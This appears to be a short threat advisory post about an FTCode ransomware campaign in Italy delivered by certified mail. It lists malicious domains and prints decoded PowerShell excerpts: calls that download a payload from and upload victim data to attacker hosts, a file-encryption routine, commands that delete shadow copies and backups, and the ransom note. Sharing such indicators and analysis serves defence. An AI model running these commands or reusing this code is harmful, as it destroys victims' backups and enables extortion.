Caution! In these last days, especially in Italy, a ransomware campaign is activated and conveyed by certified mail.
Stay away from these domains:
connect.simplebutmatters.com
home.southerntransitions.net
connect.southerntransitions.com
home.selltokengarff.com
home.ktxhome.com
home.goteamrob.com
twitter.crtcostruzionisrl.com
my.mylifeamongthewomen.com
home.hopedaybook.com
getpdfreader.13stripesbrewery.com
getpdfreader.lilupicks.com
home.artdietfitness.com
home.parkandhome.com
home.mmaut.com
aweb.theshotboard.info
cofee.theshotboard.net
home.tith.in
donald.tilmonday.com
home.healthiestu.com
home.isdes.com
connect.hairsalonlongmont.com
geer.longmonthairsalon.com
connect.hairsalonlongmont.comPowershell file analyze:
il malware provvede a scaricare un file powershell leggermente offuscato del quale rendiamo disponibile una copia decodificata ai fini di ricerca.
https://www.cert-pa.it/notizie/campagna-ransomware-ftcode-veicolata-in-italia/
# Powershell file download
$zxbvvjt.DownloadString("http://home.goteamrob.com/?need=6ff4040&vid=dpec1&") | out-file $RndNum;
# GUID extraction
$gxggaiud = $zxbvvjt.UploadString( "http://connect.simplebutmatters.com/", ("ver=$version&vid=dpec1&guid=$guid&psver="+( ( (Get-Host).Version ).Major )+"&" + $data) );
# Encryption function
function encrypt($content, $passwordString){
$salt="BXCODE hack your system";
$IVString="BXCODE INIT";
$Rijndael = new-Object System.Security.Cryptography.RijndaelManaged;
$password = [Text.Encoding]::UTF8.GetBytes($passwordString);
$salt = [Text.Encoding]::UTF8.GetBytes($salt);
$Rijndael.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $password, $salt, "SHA1", 5).GetBytes(32);
$Rijndael.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($IVString) )[0..15];
$Rijndael.Padding="Zeros";
$Rijndael.Mode="CBC";
$ecnryptor = $Rijndael.CreateEncryptor();
$ibifxufvsi = new-Object IO.MemoryStream;
$yfwfivehah = new-Object Security.Cryptography.CryptoStream $ibifxufvsi,$ecnryptor,"Write";
$yfwfivehah.Write($content, 0,$content.Length);
$yfwfivehah.Close();
$ibifxufvsi.Close();
$Rijndael.Clear();
return $ibifxufvsi.ToArray();
}
# Delete all backups
Exec('bcdedit /set tgsbhtzwci bootstatuspolicy ignoreallfailures');
Exec('bcdedit /set tgsbhtzwci recoveryenabled no');
Exec('wbadmin delete catalog -quiet');
Exec('wbadmin delete systemstatebackup');
Exec('wbadmin delete backup');
Exec('vssadmin delete shadows /all /quiet');
# Ransom
message = "<h1>All your files was encrypted!</h1>
<h2 style='color:red'><b>Yes, You can Decrypt Files Encrypted!!!</b> our price 500 USD</h2>
<p>Your personal ID: <b>$guid</b></p>
<p>1. Download Tor browser - <a href='https://www.torproject.org/download/'>https://www.torproject.org/download/</a></p>
<p>2. Install Tor browser</p>
<p>3. Open Tor Browser</p>
<p>4. Open link in TOR browser: <b>http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$guid</b></p>
<p>5. Follow the instructions on this page</p>
<h2>***** Warning*****</h2>
<p>Do not rename files</p>
<p>Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)</p>
<p>As evidence, we can for free back one file</p>
<p>Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.</p>
";
Hope this help!
.glitchlist crew